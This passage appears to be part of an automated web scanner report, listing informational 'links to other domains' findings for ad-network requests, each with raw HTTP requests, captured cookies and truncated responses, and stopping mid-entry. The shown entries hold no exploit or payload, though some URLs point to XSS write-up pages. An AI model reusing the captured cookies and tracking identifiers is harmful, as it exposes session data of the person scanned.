<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Webmetrics.com%26adT%3DApache%2BMonitoring%26adU%3DManageEngine.com/EventLogAnalyzer%26adT%3Dproxy%2Bserver%2Blog%26adU%3Dwww.splunk.com/ITSearch%26adT%3DFree%2BLog%2BFile%2BAnalyzer%26gl%3DUS&amp;usg=AFQjCNFdcLnzYw3uVzfB6d7Ul06hcfPw3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758225&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740262586&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740262682&frm=0&adk=1819763764&ga_vid=304831063.1303740263&ga_sid=1303740263&ga_hid=199340974&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=169&xpc=ZRywAON1Xo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPrenupAgreement.RocketLawyer.com%26adT%3DFree%2BPrenuptial%2BAgreement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNEtEtdonxR2g6hFKmGbMydw4xcj3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=2240541906&w=160&lmt=1303759229&flash=10.2.154&url=http%3A%2F%2Fpogoda.webalta.ru%2F&dt=1303741229140&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741229174&frm=0&adk=618464972&ga_vid=2128179421.1303741229&ga_sid=1303741229&ga_hid=1489066141&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&fu=0&ifi=1&dtd=45&xpc=CrphvdTDRQ&p=http%3A//pogoda.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pogoda.webalta.ru/%26hl%3Den%26client%3Dca-pub-1134822682510879%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.MichelinMan.com%26adT%3DWeather%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.consumer-classactions.com%26adT%3DGot%2Ba%2BData%2BBreach%2BEmail%253F%26gl%3DUS&amp;usg=AFQjCNGoC4xgk7-X1pEoKp7smEywYGybIg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

22.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303759971&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742686562&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303742686588&frm=0&adk=1607234649&ga_vid=1444597712.1303742687&ga_sid=1303742687&ga_hid=874676743&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=60&xpc=dQOO6ofOJ6&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12782

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.DailyTradeAlert.com%26adT%3D9%2BBest%2BStocks%2Bto%2BOwn%2BNow%26adU%3Dwww.obs-innovation.com%26adT%3DFree%2BDocument%2BWhite%2BPaper%26gl%3DUS&amp;usg=AFQjCNHr3R-N75W0VvPU4CVjLvuDguH5Hg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4436

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHCmAmNDJ1ozxP3Mf5vXQDJFH30_g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.28. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 12:12:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1072501689" target="_blank">learn more</a>
...[SNIP]...

22.29. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
</noscript>\n');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

22.30. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sLMxu47t>^)Y[y26^eBmD'@zmWDj/tLAupNA/*ML[uTpu!RrSf1cs(^CZv.tI8q/xu`sW=OZ3z#PJuFGHh*`H$b4vufy:^]C?mQg'K(EMIZ@?3yp9wkpsQnoc@iD:G@#d0Fg7d]E7#M:pj)ZgW:5<tK-pBGD/hdLwyL8Xcmrl6eV=VdoO'kk?Y_l`vu; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:22:47 GMT
Content-Length: 1501

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
</noscript>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

22.31. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
